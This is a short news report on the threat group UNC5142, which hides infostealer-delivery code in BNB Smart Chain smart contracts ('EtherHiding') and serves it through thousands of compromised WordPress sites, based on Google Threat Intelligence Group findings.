A group of cyber threats known as UNC5142 has been observed using smart contracts on the blockchain to distribute malware aimed at stealing information, affecting both Windows and macOS systems. Among the types of malware used are Atomic, Lumma, and Vidar. This innovative approach, called EtherHiding, hides the malicious code in the BNB Smart Chain, allowing its activities to blend in with legitimate Web3 transactions.
Thousands of compromised websites
According to reports from the Google Threat Intelligence Group , around 14,000 compromised web pages have been flagged for containing malicious JavaScript, illustrating their indiscriminate approach towards vulnerable WordPress sites. UNC5142 uses compromised websites to inject this code, allowing malware distribution to occur through a multi-stage process. A key component is the JavaScript downloader called CLEARSHORT, which facilitates malware delivery through infected sites.
Since November 2024, UNC5142 has evolved from a single contract system to a more complex strategy involving three smart contracts, thereby improving the operational agility of its campaigns. This architecture resembles a software design principle known as the proxy pattern, allowing for quick updates in critical parts of the attack without the need to modify the JavaScript on the compromised sites.
These smart contracts allow UNC5142 to adapt the upload URL. Furthermore, the analysis has revealed two distinct infrastructures of smart contracts that facilitate the distribution of malware, demonstrating their ability to adapt and maintain the resilience of their operations.
These sophisticated methods not only increase the risk for Internet users, but also make it difficult to detect and eliminate their malicious activities. Although Google has not detected activity from UNC5142 since July 2025, this could indicate a pause in their actions or a change in their operational strategy.